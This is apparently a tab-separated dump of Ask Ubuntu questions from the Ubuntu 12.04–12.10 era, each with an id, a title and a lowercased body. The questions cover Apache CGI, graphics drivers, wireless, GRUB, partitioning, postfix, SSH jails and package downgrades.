244352	basic instructions for running a cgi script inside apache on ubuntu 12.04 ?	i try to run a cgi-script on my webserver ( ubuntu 12.04 ) . but always when i type the url in my browser i get an error message `` 404 not found '' i tried to install the cgi-mod for apache2 but all the tutorials on google are like chinese language for me . can somebody tell me what i have to do ?
244355	ubuntu 12.10 : rdp from windows 7 renders empty desktop - common fix does n't work	when i use 'remote desktop connection ' in windows 7 to connect to my ubuntu 12.10 machine with xrdp installed , i can login , but the only thing i get after logging in is an empty desktop . i found that many people could fix this by creating a .xsession -file in their home-directory , with following command : gnome-session -- session=ubuntu-2d i tried it , but it does n't work . when i try that command from the terminal , it gives the following : a messagebox : could not acquire name on session bus a warning in the terminal : failed to acquire org.gnome.sessionmanager any help greatly appreciated !
244357	low resolution for nvidia quadro 600 on ubuntu 12.10	i have installed and activated nvidia 's driver but still on display it only shows only 1024x768 ( 4:3 ) and 800x600 ( 4:3 ) . my monitor 's default resolution is 1920x1080 . nvidia settings also does not help .
244360	upgrading to 12.10	i have 10.10 running on my hp compaq . i would like to upgrade it to 12.10 . the update manager is not of much use . i am not a regular to linux and request detailed steps for upgrading to the latest distribution
244368	how do i enable my wireless card ? ( dell inspiron 9400 with ubuntu 12.10 )	i am at a complete loss as to what to do here , i spent hours trying to get my wireless card ( broadcom ) to work , and have made no progress .
244371	how to multiselect in liferea ?	the only reason why i did n't use liferea instead of rssowl is that i do n't know how to select several newsitems for deleting . because there is n't a `` delete all '' -functionality i have to select each headline , which loads the content , which is wasted ; and by navigating through the list via keyboard i automatically mark other items as read , which is unintended . is multiselection possible in liferea , and if yes , how ? ( and if no , why the ... not ? )
244372	how can i install a ati video card driver ( ati radeon hd 5700 ) for ubuntu 12.10 ?	i 've tried everything i could think of to the point of having to reinstall ubuntu and try all over again .
244377	how do i access the files in a samsung galaxy s ii ?	i have a samsung galaxy s ii but my ubuntu 10.04 laptop , although it recognizes the phone when i connect it with a usb . wo n't allow me to get into the phone . do i need special drivers ?
244378	run python in terminal	trying to learn how to run my scripts through ubuntu 's terminal regularly . that being said i am familiar with bash , wget , and awk being called but how do i call python files to run in the terminal ? i would like to learn this but i am unsure on where to research it . i have a .pyw file that references several .py files in a folder .
244387	how to diagnose random freezes ?	ubuntu always seems to freeze in the first ~15 minutes of when it 's booted on my machine . sometimes it 's in the first 5 minutes , sometimes it takes 30 minutes , occasionally it never happens ... i ca n't reproduce it deterministically , but it happens often enough anyway that i probably just wait for it to happen again . how can i diagnose the freeze to figure out the cause ? note to close-voters : no , this is not a duplicate of this question . this question is about diagnosis , not a temporary recovery . the answers on that question only tell me how to kill the x server , use the magic combo to reset the kernel , etc ... . which does n't help me figure out the cause . some information : ubuntu 11.04 : 2.6.38-15-generic # 66-ubuntu smp x86_64 gnu/linux the mouse sometimes moves around , but the ui never responds . pressing ctrl+alt+f1 to get into a terminal does n't work . the alt+sysrq combos do work ... and seem to be the only things that work , aside from the mouse ( which sometimes also can move around ) . i 'm not running out of any resources ( many gigabytes of ram and file system space are free ) possibly relevant hardware ( from the hardware lister application ) : ar9285 wireless network adapter ( pci-express ) gt216 [ geforce gt 330m ] ( i 'm using the nouveau driver , which seems to work well )
244395	`` ubuntu on a stick '' devices ?	is anyone aware of any good `` pc on a stick '' or `` system on a stick '' devices that are good to run ubuntu 12.10 - or even better , have ubuntu preinstalled ? arm or x86 . i 'm looking for something like raspberry pi , except that ubuntu is not supported on it since its arm processor is too old for ubuntu 12.10 . on a related note , how is software/application support for ubuntu on arm ? is it up to par with the x86 packages ?
244399	how do i remove files as a result of the find command ?	i want to rm all the files that i get when i run find search-3s-beta |grep `` \.log\ . '' what would be the command ?
244401	terminal python _tkinter	i asked this question on how to get python to work in my ubuntu terminal . after trying python file.pyw . i was then given this error in the terminal : importerror : no module named _tkinter , please install the python-tk package . i searched for this in google and ran accross this on stackoverflow . however when i run that in the terminal i get e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied_ e : unable to lock administration directory , are you root ? i am root . where do i go from here ?
244406	how do i give www-data user to a folder in my home folder ?	i have a folder : /home/myuser/foldera i want to give www-data user write access to the above , while 'myuser ' continues to have normal access ( as it is myuser 's home folder anyway ) . which commands do i need to use ? note : i do n't want www-data to have access to any other folders in /home/myuser/ . thanks in advance .
244409	usb create for windows laptop on mac	can i create a bootable usb on a mac which i can use on a toshiba laptop which is basically stuffed ?
244414	can i have back right/middle-click maximise for horizontal/vertical maximise ?	this was a lovely feature of previous window managers . sure now i can drag a window to the left or right and it will occupy the full vertical height and half the horizontal width , but what about sideways maximisation , or vertical max . without it having to be half the screen ? is there any way to restore this functionality ? i 'm using gnome shell .
244416	what to do with graphics warning during upgrade to 12.10 in esxi 5.1 ?	i have ubuntu server 12.04 installed on vmware vsphere 5.1 latest build . i just went to upgrade 12.04 to 12.10 and it served up a graphics card limitation warning before allowing install . how do i manage this issue in vsphere 5.1 ? do-release-upgrade warns me : your graphics hardware may not be fully supported in ubuntu 12.10 . running the 'unity ' desktop environment is not fully supported by your graphics hardware . you will maybe end up in a very slow environment after the upgrade . our advice is to keep the lts version for now . for more information see wiki.ubuntu.com/x/bugs/updatemanagerwarningforunity3d do you still want to continue with the upgrade ? continue [ yn ] the wiki link states outdated hardware not providing required level of opengl support , too new hardware without driver support yet , obscure hardware without 3d support , virtual machines , binary drivers required but not installed this is definitely virtual machine issue in my case which needs resolution .
244417	why is there no /proc/bus/usb ?	i have an old thinkpad r32 2658 and i want to use dfu-util . the reference documentation starts with the following description : to run dfu-util , you need to have /proc/bus/usb mounted and working . the terminal command `` ls /proc/bus/usb '' should return something similar to , `` 001 002 003 004 005 devices '' , it should n't be empty . if it is empty , use this command : sudo mount -t usbfs usbfs /proc/bus/usb the problem is : i do n't have /proc/bus/usb at all . in /proc/bus there are only input and pci sub-directories . but i do have usb ports on my old notebook and my usb keys work well . what can i do ?
244431	ubuntu 12.04 64bit	i have never had a problem with ubuntu until today when i installed 12.04 , 64-bit . everything went fine until i tried to restart after the installation was done . the screen stays purple with nothing on it . so then i shut it down and put the disc back in and it started up fine . why does it all of a sudden need the disc to boot ?
244434	on ubuntu server 12.04 , how do i make a shell script that replaces underscores with spaces recursively ?	so far i have : for file in *\_* do file_clean= '' $ { file//_/ } '' mv -- verbose `` $ file '' `` $ file_clean '' done however , it only renames files in the root directory of the folder . how do i make it rename the files with underscores to spaces recursively on all of the files and folders within that directory ?
244436	how do you use the rownum fuction ( or similar ) in libreoffice base query ?	i am trying to help someone who wants to put data into alphabetical order with a row number . i thought i could do a query like this select `` name '' , rownum ( ) as `` row '' from `` data '' order by `` name '' but i just get a 'permission denied ' error or similar . can anyone help ? does rownum ( ) work the way i think it should ? or is there a better way to get a row number on the data ordered by name ? here is the error i am getting : access is denied : rownum in statement [ select `` description '' , rownum ( ) from `` data '' order by `` description '' asc ]
244437	why does n't perl use latest version by default ?	when i try to use new perl features ( like `` say '' instead of `` print '' ) the code fails until i put in the line `` use 5.014 ; '' and then everything runs . my installed version of perl is 5.14.2 , and it looks like the only binary i have installed , why are n't the new features being used by default ? thanks !
244438	unable to login after installing kde	i had a unity environment on my laptop and yesterday i decide to change it to kde , so i typed : sudo apt-get install kde and installation was correct , i choose lightdm in menuconfig as default login shell/service . after reboot , i have preety ubuntu kde login screen , but when i type login and password lightdm dont pass me to desktop , and x-server reset itself , and again i see a a kde login window . ( i have option to choose unity , gnome , kde unity-2d all of them restarts x11 ) is possible to fix that and use kde and lightdm ? or i must remove one of them ? my goal is to dont use unity , but i dont want reinstall by ubuntu to xbuntu or something similar .
244440	no boot after resizing my hard drive ubuntu 12.04	after resizing my partition using gparted i 've been enable to boot from my hard drive getting the error `` non system disk or disk error replace and strike ... '' now i can only access my system with a usb using ''super grub2 disk '' i tried all the methods on the net to rescue my grub but none of them worked here is what `` boot repair '' created trying to fix my boot please help me . http : //paste.ubuntu.com/1542979/
244444	ubuntu 12.04 iso image file too large to burn to dvd ?	i just downloaded the ubuntu 12.04 iso file in order to do a fresh install . however , i am not able to burn it to my dvd which only holds 4.7gb because it is too big ( > 6gb ) .
244446	unable to configure audio on hp pavilion g6 2006ax - using ubuntu 12.04 lts	i recently installed ubuntu 12.04 lts version on my hp pavilion g6 2006ax laptop . this is the only operating system that i have on my laptop ( no dual boot ) . processor & graphics detail : amd a6-4400m apu with radeon ( tm ) hd graphics ă 2 i installed amd catalyst 12.11 beta11 driver to support the graphics card . seems like it is doing ok . unfortunately , i am not able to configure my audio drivers and it just shows up as speaker icon with a dash dash dash next to it . is there anyway that i can help you troubleshoot this issue ? ( like config , logs etc . ) i am sure other hp pavilion g6 users might have faced this ... i am unable to find a solution after searching ask ubuntu forums . running alsamixer on commandline ... provides the following info : card : hd-audio generic chip : ati r6xx hdmi
244447	how do i try ubuntu on my macbook pro ?	well , i 've heard that ubuntu is a great operating system , and i 'd love to try it . i have a macbook , and do n't want to replace os x mountain lion . how do try ubuntu without uninstalling os x ?
244450	ureadahead slows down boot process on ubuntu 12.04	i 'm using ubuntu 12.04 64bit installed on a wd velociraptor ( 10.000 rpm ) hard disk . i 'm not using wubi , it 's a clear install . i think that `` adding swap '' procedure on boot takes too long . at first i thought that it has something to do with the swap mounting , but as you can see , i 've spotted the problem in the `` ureadahead '' deamon . you can see below dmesg partial output : [ 5.347709 ] console : switching to colour frame buffer device 210x65 [ 5.351756 ] fb0 : vesa vga frame buffer device [ 5.613411 ] ext4-fs ( sda3 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 21.421858 ] adding 1227772k swap on /dev/sda5 . priority : -1 extents:1 across:1227772k [ 21.425834 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 21.425841 ] addrconf ( netdev_up ) : eth1 : link is not ready complete dmesg output taking into account my hard drive 's speed , this delay is not normal . after upgrading to the latest kernel ( 3.2.0.36 from 3.2.0.35 ) or after removing `` /var/lib/ureadahead/pack '' file , the problem is temporary solved , just for one boot . after the second boot the problem returns . this is the dmesg output when everything works perfect : [ 5.120096 ] console : switching to colour frame buffer device 210x65 [ 5.124150 ] fb0 : vesa vga frame buffer device [ 5.285586 ] ext4-fs ( sda3 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 6.953086 ] adding 1227772k swap on /dev/sda5 . priority : -1 extents:1 across:1227772k [ 7.516909 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 7.516916 ] addrconf ( netdev_up ) : eth1 : link is not ready complete dmesg output as suggested in the comments i 've tried to disable the swap mounting and the delay was moved to the next process , so it seems that it has nothing to do with swap mounting : dmesg output : [ 5.862973 ] ext4-fs ( sda3 ) : recovery complete [ 5.887252 ] ext4-fs ( sda3 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 17.589428 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 17.589435 ] addrconf ( netdev_up ) : eth1 : link is not ready @ gertvdijk noticed that in the latest dmesg output my system recovered from something , but this just happened just when i 've comment out the swap from `` /etc/fstab '' . i 've spoted the problem ureadahead slows down the boot process . this is weird since the opposite should happen ! below i 'm posting bootchart images and dmesg output of three different boots : without ureadahead ( disabled following this guide ) there is no delay : dmesg output ( ureadahead disabled ) bootchart output ( ureadahead disabled ) with ureadahead enabled first boot ( pack file is build for the first time ) no delay : dmesg output ( ureadahead enabled ) bootchart output ( ureadahead disabled ) with ureadahead enabled second boot ( ureadahead full working ) delay is back : dmesg output ( ureadahead enabled second boot ) bootchart output ( ureadahead disabled second boot ) note my question seems to be a duplicate of this very slow boot due to mounting filesytem which concerns ubuntu 11.04 and has no solution yet ! if any admin reading this , i do n't know if i have to delete my question as a duplicate since the problem does n't seems to be the swap mounting ... if so , delete it , or please , inform me to do so !
244451	i can not login into ubuntu 12.10	i just installed 12.10 and now i ca n't login when i typed in my correct password ? is there a way to overcome this issue ? why is this happen ?
244452	use /etc/aliases for outgoing mail relayed by postfix with local domain	i 'm using ubuntu 12.04 with postfix configured as satellite system that relays outgoing mail to gmail . for sake of example , my registered domain is example.com i want root cronjobs ' error output to be mailed to my real david @ example.com inbox . i have this relay working correctly . but these root cronjobs are set by default to email to root @ example.com which is n't a real email address . i have in my /etc/aliases : root : david @ example.com example.com is n't listed in postfix 's main.cf 's mydestination so postfix does n't think this mail is local . it bypasses processing via /etc/aliases and tries to send to root @ example.com . a workaround is adding mailto=david at the top of each cron file . but there are many . another workaround is to setup root @ example.com as a real inbox that forwards to david @ example.com . is there a better way ? i.e . is there a way to relay emails that have local domains but still process their addressee with /etc/aliases ?
244453	is there a good ssh jail solution for ubuntu 12 ... . ?	is there a good how-to/tutorial on setting up a chrooted ssh environment on ubuntu 12.04lts . i 'm not interested in chrooted sftp which is easy to implement . it 's jailing users in their home directory when they log in via ssh that i 'm interested in . grateful for any help , thank you
244457	ubuntu 12.04 resolution and gpu	i am seeking help concerning my resolution . i have a geforce sparkle 6600 le card with nvidia driver 304.64 , current for my card , installed with an hp w1707 monitor on a compaq presario pc , 32bit system . before i installed the driver , i still had the resolution problem , which is that it does not offer me all the resolutions my monitor and gpu support . i only get a very ugly 640x480 input . i have tried all that i could think of . xrandr gives me this ; screen 0 : minimum 8 x 8 , current 640 x 480 , maximum 4096 x 4096 vga-0 connected 640x480+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 640x480 59.9*+ 320x240 120.1 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) tv-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) but on linux mint and windows with the same drivers and card , i get 1440x900 . i 'm also getting weird black screen blinkings whenever i log into ubuntu , and when i boot into ubuntu i get a white bar code screen where i can not see the text or the ubuntu logo . i also can not get opengl to work despite my card supporting it . any and all help is greatly appreciated . thanks !
244463	where is the acpi log ?	sometimes my computer shuts down unexpectedly , usually when some process is taxing the cpu . this answer mentions that `` when a system shuts down in a normal way , it is either a user with root privileges or an acpi script '' , and `` an acpi shutdown can be caused by power button press , overheating or low battery ( laptop ) . '' so my guess is that it was overheating , but i 'd like to be sure . a comment in the question linked above says that /var/log/acpid would contain some information , but that file does n't exist on my machine . does that log get placed somewhere else in ubuntu ? do i need to configure something to make it show up ? note : the methods suggested here did n't return any relevant information ( dmesg | grep -i acpi did n't return timestamps , and /var/log/kern.log did n't have any entries for the period when the computer shut down ) . i found these relevant entries in /var/log/syslog , but would like something cleaner/more informative , which i assume acpid would provide â if i could find it ...
244464	how to make an executable require root password ?	how do you make an executable file ( a shell script not of my own creation ) , when be accessed , pop up a little window requesting the password ( as of now it is set to all executable , owner read and right , group and others only read . )
244466	can i unhide the panel in xfce 4.10 using a key press rather than using mouse cursor hover to reveal it ?	i would like to be able to unhide the xfce panel by pressing a key instead of placing the mouse cursor at the edge of the screen . i 'm running xubuntu 12.04 but updated to xfce 4.10
244470	list all suggested packages for currently installed packages	every time i install a package : sudo apt-get install < pkg > apt-get displays a list of suggested packages . i have simply ignored these so far , but some of these suggestions are actually good ( and some are not ) . i would like to recover all these lists into one big list ( so that i can review it and decide if there is some package i want to install ) , but i could not see them in /var/log/apt/history.log . that is , i 'm looking for something like list = [ ] for package in installed_packages : list.append ( package.name ) print list
244471	can i use inetd settings with xinetd ?	can i use all inetd settings with xinetd ? i know inetd is not secure , so i wanted to switch my plans to xinetd . i was planning on using inetd like this : inetd -c 12 -s 1 . the flags correspond to max-connections-per-ip-per-minute and max-child-per-ip . if i use xinetd , would i be able to continue using those two settings ?
244472	ca n't see home media server on 12.04 lts	fair warning , im a beginner at unbuntu . i am running my home media server off of my old windows desktop with windows xp using serviio and all the devices in my house can see it ( xbox , ps3 , smart tvs , my cell phone , tablet , and my roommates windows computer ) but i ca n't seem to find it on my laptop running ubuntu 12.04 . when i go to network > windows network and click on it it pops up and says unable to mount location . failed to receive shared list from server i 'm sure someone out their knows how to fix this .
244473	how and why should i specify mtrr_gran_size/mtrr_chunk_size ?	i noticed today that /var/log/dmesg contains several dozen lines with information about something called gran_size and *bad*gran_size , followed by what appears to be an instruction for me : [ 0.000000 ] mtrr_cleanup : can not find optimal value [ 0.000000 ] please specify mtrr_gran_size/mtrr_chunk_size do i need to do what it says ? how would i ?
244478	what is the best audio and video recorder similar to windows media encoder ?	i want to broadcast addressing of our leader and before we are on windows and using windows media encoder for this . how can i get this functionality in ubuntu 12.04 ? also i want save addressing in audio and video format , so please tell be best audio and video recorder options for this .
244479	how can i use my usb flash drive again after i zeroed it out in disks ?	i 've used the `` disks '' utility to zero out a usb flash drive ( pendrive ) . now it 's not showing up anymore as a usable storage medium . i need to use this usb drive ( of 4 gb ) again to write an os image to it to re-image an old laptop , however i ca n't seem to do anything with it at this point . where do i go from here ? i have no clue where to start looking for a solution .
244482	fresh install of 12.10 and 4 x monitors	i have a fresh installation of ubuntu 12.10 running on a new dell precision t7600 workstation . i four dell 30 '' monitors connected to a single nvidia nvs 450 using display port cables . i was able to get 12.10 installed and the nvidia drivers configured with only minimal hassle . i was able to get a pair of monitors working in twinview but i was unable to configure all four . when i moved to the four monitor setup , i configured each screen as its own xserver and used xinerama on top . i was able to see the background on all four screens and the mouse moved around correctly , but i was missing the dock on the left side and the menus at the top . i tried reinstalling twice ( after debugging left my system unusable ) . i tried using ubuntu 's version of the nvidia drivers , and the ones from nvidia 's website . i tried unity and gnome3 ( the new version and the `` legacy '' desktop version ) . unfortunately i had to give up after two days of work and install redhat 5.9 . it works with my monitor setup , but installing chrome has turned out to be impossible so far and my keyboard 's volume knob wo n't work . i know these are minor things but please help me come back to ubuntu ! i 'm actually upgrading from a dell precision 690 with two nvidia cards ( quadrofx 570 and 6200 ) running ubuntu 10.04lts . i ran this same monitor setup on the older system without a problem so i 'm fairly sure my config within ubuntu is correct is correct .
244486	how to get the most recent process id of specific application	i need to get the most recent id of specific application . as soon as the application starts , the id should be taken . please , help . any idea ? regards , uguudei
244488	how do i get my keyboard to work in grub on this old ibm thinkcentre pc ?	recently , i installed ubuntu 12.10 on an old ibm thinkcentre alongside windows xp professional . i have had problems with ubuntu , so i would like to boot into windows to delete the ubuntu partition . yet , my keyboard refuses to work during grub . i have used a benq and generic usb keyboard and have yet to try with a ps/2 keyboard . i can use the bios , but it stops working during grub . the thinkcentre has an old celeron and 0.99gb of ram . does anyone know how to make my keyboard work ?
244489	how to download a full multi-paged news article ?	when i visit a site like the new york times , i sometimes like to save the page for offline viewing . but many of the articles are linked in a series , like page 1 , 2 , 3 , 4 , 5 . is there a way to save the entire article across multiple pages ?
244491	add ubuntu installation on separate drive to grub	my current setup includes a sata hdd , with xubuntu 12.10 on it . i just added an old ide drive i had lying around to my desktop , and i used a liveusb to install ubuntu 12.10 onto it . when i partitioned , i manually added the partition to the ide hdd , since i did n't want to overwrite my xubuntu install ; when i chose the drive to install grub on , i decided to try selecting the sata hdd , since it already had my xubuntu install ( and grub ) on it . this did n't work , since at the end of the installation it gave me a fatal error , saying it could n't install grub on the drive . it allowed me to try selecting another drive , so i tried just installing it on the ide hdd ( where i was actually installing ubuntu ) , but that gave me a fatal error as well ; after that i just chose not to install grub . now , is there a way to add this ubuntu installation ( that does n't have grub installed on it , and is on a separate hard drive ) to my current grub list ( on the sata drive , with xubuntu ) , so i can choose to boot either drom a single grub screen ? ( i.e . so i do n't have to press f+12 and select the drive to boot to load ubuntu ) if you need more info , just let me know .
244492	my computer does not recognize wireless	i have a dell inspiron n4010 ; i recently installed ubuntu , but it does n't recognize the wifi , it does n't find any connection ; i have to connect with cable . i do n't know if it is the network , the controller , the driver ... what should i do ? thank you . tengo un compu marca dell inspiron n4010 ; hace poco instalé el ubuntu , pero no reconocce el wifi , no lee ninguna conexión , me toca conectarme por cable . no se si es la tarjeta , el controlador , el driver ... qué debo hacer ? gracias . i 've tried with the broadcom-sta controller for the bcm43xx , also with bcmwl-kernel-source . my version of the card is the bcm4313 , as shown on the terminal . as you noticed , i 'm quite new with ubuntu , and we tried options trough console or software center , and also with additional drivers on system config . a friend of mine is helping me tough and he is going berserk with not being able to fix the bug . more info on the system : 12.04 lts precise dell inspiron n4010 wifi card : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) i do n't think you 'll need any further info , but if i 'm wrong just send the code and i 'll transcribe the result on the post . we will really appreciate the effort you make for us newbie users to get along with this amazing os . without any further , good day and thank you ! ! !
244495	why do the update/download servers cap out at like 100-130 kb/s ?	whenever i 'm updating or doing a fresh install it always seems the package servers download speed caps out at 130 kb/s , why is that ?
244497	how do i assign multiple ip address when boot	currently i directly type the following command to bind static ip for eth0 via normal user . $ sudo ifconfig eth0:1 192.168.20.66 how do i run this command when boot ubuntu without typing password ?
244499	resizing ext4 partition and applying it to an ntfs partition in ubuntu 12.04.1 ?	i made a miscalculation on my ubuntu install and now need more space for my windows ( ntfs ) partition ( sda2 ) . the problem is that i allocated ~ 100gib to what i thought would be a shared media storage directory ; this was placed in an extended partition ( sda4 ) , comprised of ~ 7gib in a swap file ( sda5 ) and ~ 100gib in an ext4 storage partition ( sda6 ) , respectively . i no longer require this partitioning and am now looking to allocate this sda6 space more judiciously . as i understand it , i need to be able to have unallocated space in a partition next to the partition that i would like to add space to . there i have a problem , as i need to move ~55gib from sda6 ( ext4 ) to sda2 ( ntfs ) . please note that sda1 is a small ntfs windows boot partition and sda3 is my ext4 ubuntu install partition that does not have any unallocated space ( at present ) , and only 22gib unused . lastly , i am presently in gparted off of a usb boot and have a pending operation of shrinking /dev/sda6/ from 99.96gib to 44.18gib , but alas , i can not add to sda2 as was my intention . i have backed up my system , though i would prefer not to undertake anything with a large probability of file loss or grub2 failure . may i please have any relevant recommendations ? thanks so much in advance . ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8d769ec6 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 341301247 170445824 7 hpfs/ntfs/exfat /dev/sda3 341301248 399894527 29296640 83 linux /dev/sda4 399896574 625141759 112622593 5 extended /dev/sda5 399896576 415518719 7811072 82 linux swap / solaris /dev/sda6 415520768 625141759 104810496 83 linux disk /dev/sdb : 4022 mb , 4022337024 bytes 255 heads , 63 sectors/track , 489 cylinders , total 7856127 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 38 7839719 3919841 b w95 fat32
244500	unity bar and menu bar gone	i have a bootable usb stick that has ubuntu 12.10 on it , so i loaded it onto my computer which is semi old because it was really full and ubuntu is nice software when it works . and all went well until i booted it up the first time and it said that the compiz thing was missing and i looked that up on the internet and i must have typed 20 different codes into terminal , and nothing seemed to work . can you please help ? i dont know what to do anymore and the only thing i can do it open up terminal because nothing pops up on the screen . thanks : )
244507	mouse cursor freaks out when xbox 360 controller connected	i think i screwed something up in a hid library when trying to install a ps3 controller not long ago , as the ps3 controller never worked right , and now when i try to connect an xbox 360 controller , the mouse cursor jumps to the top-left corner of the screen and neither it nor the keyboard will respond . any idea what i ought to purge to fix this ? thanks !
244508	postfix can not resolve local ips from name server	i currently have a server running `` ubuntu server 12.04.1 lts '' installed with postfix bind 9 ( slave ) the postfix can not seem to resolve my internal ips to name server ( ptr ) entry i have within bind9 settings . eg . i am wanting dns to resolve 192.168.0.20 to priv-000-020.internal.domain.com by using a bind9 `` 168.192.in-addr.arpa record in my maste/slave folder which contains a record like this : - $ origin 0.168.192.in-addr.arpa $ generate 1-254 $ ptr priv-000- $ .internal.domain.com i have checked using nslookup & dig , both work fine without any issues resolving ip to the name . i have made sure that the name server is the first in the list : - /etc/resolv.conf /var/spool/postfix/etc/resolv.conf i have also tried also going into /etc/postfix/main.cf and added smtp_host_lookup = native , dns i am only using this system to relay emails to my exchange server & that works perfectly but try to get this name resolving issue fixed . not sure if this is important to anyone but if i remove `` native '' i can not relay emails to my exchange server . i know i can use hosts & that appears to work fine but was really wanting to keep the same setup & not have to manually enter every single ip address into the hosts file . hopefully someone with better linux knowledge can help me as i have wasted nearly 6 hours on trying to resolve this issue with any success .
244509	how not to mount a windows partion on startup ?	i 'm going to install windows and i do n't want it 's partition to be mounted when ubuntu starts . how do i do this ? also , are ubuntu partitions mounted on windows startup ?
244511	sharing partitions between ubuntu and windows	i 'm going to install w7 and ubuntu 12.04.1 , and my partition tab will look like this : total hd space : 320gb 120gb - windows ( 15gb for the system , the rest for my games ) 28gb - ubuntu / 150gb - separate partition for sharing documents ( music , videos , private files etc )
244515	installing a previous version of a package when you do n't have the .deb available ?	same question as how-to-downgrade-a-package-via-apt-get , except what if it 's on a newly deployed server and the archived .deb is not there ? for example , https : //launchpad.net/ubuntu/precise/amd64/wget tells me the previous version is 1.13.4-1ubuntu2 , and i have 1.13.4-2ubuntu installed : $ dpkg -l | grep wget ii wget 1.13.4-2ubuntu1 retrieves files from the web when i try to force the version : vagrant @ es2 : ~ $ sudo apt-get install wget=1.13.4-1ubuntu2 reading package lists ... done building dependency tree reading state information ... done e : version '1.13.4-1ubuntu2 ' for 'wget ' was not found is there a way to `` ask '' apt-get update to fetch information/urls/etc . about older versions ? is the solution to run my own apt repository with the versions i want ?
244517	possible to run custom dhcp and dns with fall-back to cable modem ?	i am trying to accomplish a task that may , or may not , require a creative solution . essentially , i want to run my own dhcpd and , more importantly , dns for my home network . i want to run my own name server for the purpose of having *.local names assigned to our various computers and devices . i want to run my own dhcp server so that any computers or devices that access our network will use my name server automatically . my cable modem does not offer this functionality and my `` routers '' are setup as `` dumb '' access points . for example , i do n't expect my mother ( no offense to moms ) to remember an ip address when she wants to view something shared over the network ; or , my sibling may want to play a game on a custom lan server . the problem i must absolutely avoid is leaving this system in the hands of other people who live in the building . if the cable modem crashes , they can simply call the cable company or restart it when i 'm not available . if the linux system crashes , i need the computers and devices to still retain full access to the web . i would like to avoid any ugly solutions such as manually editing 'hosts ' files on every device that may ever use the network . i 've tried one application and protocol that would generate *.local domains for each system but it did n't work . unfortunately , i forget its name . does anyone have suggestions on running my own dhcp/dns and providing a fall-back to my cable modem ? alternative solutions are welcome as well . i 'm sure i 'm not the first person to want custom names on a lan without leaving administration up to people who are neither willing or able . thanks . note : please do not argue any points related to the usage of tlds . i understand the risks .
244526	unable to synchronize time using ntp	when i try to synchronize time using ntp . using the below command sudo ntpdate -b pool.ntp.org i get this error saying ntp socket is in use . how to fix this ? 18 jan 05:53:49 ntpdate [ 21340 ] : the ntp socket is in use , exiting
244528	how to change , configure and make a installed package ... darkstat	i 've installed darkstat via : `` apt-get install '' . i then downloaded the darkstat source code to make some changes to it using : `` apt-get source darkstat '' . i made my changes , then i used the command : `` sudo ./configure -- with-chroot-dir=~/my-darkstat '' . it configured and then i used : `` sudo -i '' then make to run the make file . i did n't see any changes to the actual program though . am i just doing this horribly wrong or is there a different way ? i would love to make some custom changes to packages but obviously it 's all for not if i ca n't get those custom changes to install .
244542	several indicators not visible on panel in ubuntu 12.10	i installed everpad on my ubuntu 12.10 ( which was a upgraded from ubuntu 12.04 ) . but now i am not able to run it , creat any new notes . also , its indicator icon is not visible in panel . system monitor shows that the application is running . when i click on everpad icon in launcher nothing happens . however i can run everpad settings . please help
244544	how do i install python 3.3 ?	i have downloaded python 3.3 from the official site but no idea how to install it . i 'm using ubuntu 12.04
244546	manual kernel upgrade and ubuntu update	running ubuntu 12.10 . i manually upgraded kernel to 3.7.0 . now ubuntu update is offering me updates for the 3.5.0.22.28 version , while stating that my installed version is 3.5.0.21.27 . i guess that letting these updates run is not safe . am i right ? if this is indeed the case , how do i prevent from something getting screwed accidentally by the update . in case this is safe i would like to know why . thanks . edit : as sergey requested this is the method i followed when installing the new version : http : //askubuntu.com/a/142000/65757 and i installed the following version : http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.7-raring/
244557	gnome uses qt for rendering	i 've just installed kde on my ubuntu 12.04 ( sudo apt-get install kde-full ) . normally i use gnome ( not unity ) , but after installation of kde i see that the rendering was changed . everything looks like it was rendered by qt , not gtk . so my question is how to check which rendering engine is being used ( qt or gtk ) ? and how to change it ?
244560	windows 7 user ca n't successfully download or install ubuntu	i 've been using windows for 18 years and am finally sick of it , so want to try ubuntu . i have followed the installation instructions on the official ubuntu sites but ca n't make any progress . my computer does not have a cd drive ( slimline laptop ) so i followed the instructions to download to a live usb and also directly onto a partition using windows installer . when the downloads are complete nothing else happens , but the file `` ubuntu-12.10-desktop-i386 '' can be found through explorer . double clicking on this file opens a dialogue box called `` windows disc image burner '' which gives the message `` a disc burner was n't found '' . and that 's it ! nothing else happens . i 've tried downloading ubuntu direct to a partition and the 'live usb ' trial from ubuntu and ubuntu mint but get the same result . nothing shows on the boot manager either ... am i doing something wrong ? can anyone help ? !
